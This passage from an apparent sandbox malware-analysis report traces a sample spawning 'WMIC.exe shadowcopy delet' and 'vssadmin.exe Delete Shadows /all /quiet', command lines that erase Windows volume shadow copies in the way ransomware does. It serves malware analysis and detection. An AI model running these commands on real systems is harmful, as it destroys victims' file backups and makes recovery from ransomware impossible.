LCType=0xe, lpLCData=0x109f80c, cchData=8 | out: lpLCData=".") returned 2 [0144.948] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x109f7f8, cchData=8 | out: lpLCData=",") returned 2 [0144.948] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.949] GetProcessHeap () returned 0x3110000 [0144.949] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x0, Size=0x20c) returned 0x3117ba0 [0144.949] GetConsoleTitleW (in: lpConsoleTitle=0x3117ba0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0145.188] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0145.189] GetProcAddress (hModule=0x74030000, lpProcName="CopyFileExW") returned 0x74044330 [0145.189] GetProcAddress (hModule=0x74030000, lpProcName="IsDebuggerPresent") returned 0x74045930 [0145.189] GetProcAddress (hModule=0x74030000, lpProcName="SetConsoleInputExeNameW") returned 0x772c09d0 [0145.189] ??_V@YAXPAX@Z () returned 0x1 [0145.189] GetProcessHeap () returned 0x3110000 [0145.189] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x400a) returned 0x3118ce8 [0145.189] GetProcessHeap () returned 0x3110000 [0145.189] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x3118ce8) returned 1 [0145.190] _wcsicmp (_String1="WMIC.exe", _String2=")") returned 78 [0145.190] _wcsicmp (_String1="FOR", _String2="WMIC.exe") returned -17 [0145.190] _wcsicmp (_String1="FOR/?", _String2="WMIC.exe") returned -17 [0145.190] _wcsicmp (_String1="IF", _String2="WMIC.exe") returned -14 [0145.190] _wcsicmp (_String1="IF/?", _String2="WMIC.exe") returned -14 [0145.190] _wcsicmp (_String1="REM", _String2="WMIC.exe") returned -5 [0145.190] _wcsicmp (_String1="REM/?", _String2="WMIC.exe") returned -5 [0145.190] GetProcessHeap () returned 0x3110000 [0145.190] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x58) returned 0x3117db8 [0145.190] GetProcessHeap () returned 0x3110000 [0145.190] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x1a) returned 0x3117e18 [0145.190] GetProcessHeap () returned 0x3110000 [0145.190] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x2c) returned 0x3117e40 [0145.191] GetConsoleTitleW (in: lpConsoleTitle=0xf7fa88, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0145.760] malloc (_Size=0xffce) returned 0x3422600 [0145.761] ??_V@YAXPAX@Z () returned 0xf7f814 [0145.761] malloc (_Size=0xffce) returned 0x34325d8 [0145.761] ??_V@YAXPAX@Z () returned 0xf7f5cc [0145.762] GetFileAttributesW (lpFileName="WMIC.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\wmic.exe")) returned 0xffffffff [0145.762] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0145.762] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0145.762] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0145.762] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0145.762] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0145.762] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0145.762] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0145.762] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0145.762] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0145.762] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0145.762] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0145.762] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0145.762] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0145.762] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0145.762] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0145.762] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0145.762] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0145.762] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0145.762] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0145.762] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0145.762] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0145.762] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0145.762] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0145.763] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0145.763] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0145.763] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0145.763] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0145.763] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0145.763] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0145.763] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0145.763] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0145.763] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0145.763] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0145.763] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0145.763] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0145.763] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0145.763] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0145.763] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0145.763] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0145.763] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0145.763] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0145.763] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0145.763] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0145.763] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0145.763] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0145.763] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0145.763] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0145.763] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0145.763] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0145.763] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0145.763] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0145.763] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0145.763] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0145.763] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0145.763] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0145.763] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0145.763] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0145.763] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0145.763] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0145.763] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0145.763] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0145.764] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0145.764] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0145.764] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0145.764] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0145.764] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0145.764] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0145.764] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0145.764] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0145.764] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0145.764] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0145.764] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0145.764] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0145.764] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0145.764] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0145.764] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0145.764] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0145.764] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0145.764] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0145.764] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0145.764] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0145.764] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0145.764] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0145.764] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0145.764] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0145.764] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0145.764] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0145.764] ??_V@YAXPAX@Z () returned 0x1 [0145.764] GetProcessHeap () returned 0x3110000 [0145.764] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xffd6) returned 0x3124d98 [0145.765] GetProcessHeap () returned 0x3110000 [0145.765] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x3e) returned 0x3117e78 [0145.765] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0145.765] malloc (_Size=0xffce) returned 0x34325d8 [0145.765] ??_V@YAXPAX@Z () returned 0xf7f34c [0145.765] GetProcessHeap () returned 0x3110000 [0145.765] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x1ffa4) returned 0x3134d78 [0145.767] SetErrorMode (uMode=0x0) returned 0x8001 [0145.767] SetErrorMode (uMode=0x1) returned 0x0 [0145.767] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x3134d80, lpFilePart=0xf7f36c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xf7f36c*="Desktop") returned 0x17 [0145.767] SetErrorMode (uMode=0x8001) returned 0x1 [0145.767] GetProcessHeap () returned 0x3110000 [0145.767] RtlReAllocateHeap (Heap=0x3110000, Flags=0x0, Ptr=0x3134d78, Size=0x4a) returned 0x3134d78 [0145.767] GetProcessHeap () returned 0x3110000 [0145.767] RtlSizeHeap (HeapHandle=0x3110000, Flags=0x0, MemoryPointer=0x3134d78) returned 0x4a [0145.768] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x109f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0145.768] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0145.768] GetProcessHeap () returned 0x3110000 [0145.768] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x1b4) returned 0x3117ec0 [0145.768] GetProcessHeap () returned 0x3110000 [0145.768] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x360) returned 0x3110ae0 [0145.768] GetProcessHeap () returned 0x3110000 [0145.768] RtlReAllocateHeap (Heap=0x3110000, Flags=0x0, Ptr=0x3110ae0, Size=0x1b6) returned 0x3110ae0 [0145.768] GetProcessHeap () returned 0x3110000 [0145.768] RtlSizeHeap (HeapHandle=0x3110000, Flags=0x0, MemoryPointer=0x3110ae0) returned 0x1b6 [0145.768] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x109f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.768] GetProcessHeap () returned 0x3110000 [0145.768] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xe0) returned 0x3118080 [0145.768] GetProcessHeap () returned 0x3110000 [0145.768] RtlReAllocateHeap (Heap=0x3110000, Flags=0x0, Ptr=0x3118080, Size=0x76) returned 0x3118080 [0145.768] GetProcessHeap () returned 0x3110000 [0145.768] RtlSizeHeap (HeapHandle=0x3110000, Flags=0x0, MemoryPointer=0x3118080) returned 0x76 [0145.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.768] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0xf7f118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f118) returned 0xffffffff [0145.768] GetLastError () returned 0x2 [0145.768] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMIC.exe.*", fInfoLevelId=0x1, lpFindFileData=0xf7f0f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f0f8) returned 0xffffffff [0145.768] GetLastError () returned 0x2 [0145.769] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.769] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0xf7f118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f118) returned 0xffffffff [0145.769] GetLastError () returned 0x2 [0145.769] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.exe.*", fInfoLevelId=0x1, lpFindFileData=0xf7f0f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f0f8) returned 0xffffffff [0145.769] GetLastError () returned 0x2 [0145.769] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.769] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0xf7f118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f118) returned 0xffffffff [0145.769] GetLastError () returned 0x2 [0145.769] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\WMIC.exe.*", fInfoLevelId=0x1, lpFindFileData=0xf7f0f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f0f8) returned 0xffffffff [0145.770] GetLastError () returned 0x2 [0145.770] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.770] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0xf7f118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f118) returned 0xffffffff [0145.770] GetLastError () returned 0x2 [0145.770] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\WMIC.exe.*", fInfoLevelId=0x1, lpFindFileData=0xf7f0f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f0f8) returned 0xffffffff [0145.770] GetLastError () returned 0x2 [0145.770] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.770] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0xf7f118, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf7f118) returned 0x3118100 [0145.771] GetProcessHeap () returned 0x3110000 [0145.771] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x0, Size=0x14) returned 0x3118140 [0145.771] FindClose (in: hFindFile=0x3118100 | out: hFindFile=0x3118100) returned 1 [0145.772] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0145.772] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0145.772] ??_V@YAXPAX@Z () returned 0x1 [0145.772] GetConsoleTitleW (in: lpConsoleTitle=0xf7f5fc, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0146.214] InitializeProcThreadAttributeList (in: lpAttributeList=0xf7f528, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xf7f514 | out: lpAttributeList=0xf7f528, lpSize=0xf7f514) returned 1 [0146.214] UpdateProcThreadAttribute (in: lpAttributeList=0xf7f528, dwFlags=0x0, Attribute=0x60001, lpValue=0xf7f510, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xf7f528, lpPreviousValue=0x0) returned 1 [0146.214] GetStartupInfoW (in: lpStartupInfo=0xf7f560 | out: lpStartupInfo=0xf7f560*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0146.214] GetProcessHeap () returned 0x3110000 [0146.214] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x18) returned 0x3118100 [0146.214] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0146.214] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0146.214] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0146.214] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0146.214] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0146.214] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0146.214] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0146.214] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0146.214] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0146.214] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0146.214] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0146.215] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0146.215] GetProcessHeap () returned 0x3110000 [0146.215] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x3118100) returned 1 [0146.215] GetProcessHeap () returned 0x3110000 [0146.215] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xa) returned 0x3118100 [0146.215] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0146.217] _get_osfhandle (_FileHandle=1) returned 0x90 [0146.217] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0146.438] _get_osfhandle (_FileHandle=0) returned 0x8c [0146.438] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0146.661] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC.exe shadowcopy delet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xf7f4b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC.exe shadowcopy delet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf7f4fc | out: lpCommandLine="WMIC.exe shadowcopy delet", lpProcessInformation=0xf7f4fc*(hProcess=0xe0, hThread=0xdc, dwProcessId=0x1834, dwThreadId=0x1838)) returned 1 [0147.012] CloseHandle (hObject=0xdc) returned 1 [0147.012] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0147.012] GetProcessHeap () returned 0x3110000 [0147.012] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x3116be0) returned 1 [0147.012] GetEnvironmentStringsW () returned 0x3116be0* [0147.012] GetProcessHeap () returned 0x3110000 [0147.012] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xb1a) returned 0x3114b58 [0147.012] FreeEnvironmentStringsA (penv="=") returned 1 [0147.012] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0264.418] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0xf7f494 | out: lpExitCode=0xf7f494*=0x80041014) returned 1 [0264.419] CloseHandle (hObject=0xe0) returned 1 [0264.419] _vsnwprintf (in: _Buffer=0xf7f57c, _BufferCount=0x13, _Format="%08X", _ArgList=0xf7f49c | out: _Buffer="80041014") returned 8 [0264.420] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041014") returned 1 [0264.420] GetProcessHeap () returned 0x3110000 [0264.420] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x3114b58) returned 1 [0264.420] GetEnvironmentStringsW () returned 0x3118160* [0264.420] GetProcessHeap () returned 0x3110000 [0264.420] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xb40) returned 0x3114980 [0264.421] FreeEnvironmentStringsA (penv="=") returned 1 [0264.421] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0264.421] GetProcessHeap () returned 0x3110000 [0264.421] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x3114980) returned 1 [0264.421] GetEnvironmentStringsW () returned 0x3118160* [0264.421] GetProcessHeap () returned 0x3110000 [0264.421] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xb40) returned 0x3114980 [0264.421] FreeEnvironmentStringsA (penv="=") returned 1 [0264.421] GetProcessHeap () returned 0x3110000 [0264.421] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x3118100) returned 1 [0264.421] DeleteProcThreadAttributeList (in: lpAttributeList=0xf7f528 | out: lpAttributeList=0xf7f528) [0264.421] ??_V@YAXPAX@Z () returned 0x1 [0264.421] _get_osfhandle (_FileHandle=1) returned 0x90 [0264.421] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0264.754] _get_osfhandle (_FileHandle=1) returned 0x90 [0264.754] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x10a3890 | out: lpMode=0x10a3890) returned 1 [0265.229] _get_osfhandle (_FileHandle=1) returned 0x90 [0265.229] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0265.584] _get_osfhandle (_FileHandle=0) returned 0x8c [0265.584] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x10a3894 | out: lpMode=0x10a3894) returned 1 [0265.888] _get_osfhandle (_FileHandle=0) returned 0x8c [0265.888] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0266.213] SetConsoleInputExeNameW () returned 0x1 [0266.213] GetConsoleOutputCP () returned 0x1b5 [0266.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a3850 | out: lpCPInfo=0x10a3850) returned 1 [0266.549] SetThreadUILanguage (LangId=0x0) returned 0xd20409 [0266.911] exit (_Code=-2147217388) [0266.912] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 185 os_tid = 0x1114 Process: id = "11" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xbac5000" os_pid = "0x8e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x7f4" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 42 os_tid = 0x7f0 Thread: id = 45 os_tid = 0xd70 Thread: id = 67 os_tid = 0x1384 Thread: id = 129 os_tid = 0x1128 Thread: id = 169 os_tid = 0xcc4 Process: id = "12" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0xbb3c000" os_pid = "0xb60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "vssadmin.exe Delete Shadows /all /quiet" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 43 os_tid = 0xe20 Thread: id = 249 os_tid = 0x384 Thread: id = 2214 os_tid = 0x2fd0 Thread: id = 2217 os_tid = 0x2fe0 Thread: id = 2221 os_tid = 0x2ff0 Process: id = "13" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0xbf7d000" os_pid = "0x1240" os_integrity_level = "0x3000" os_privileges = 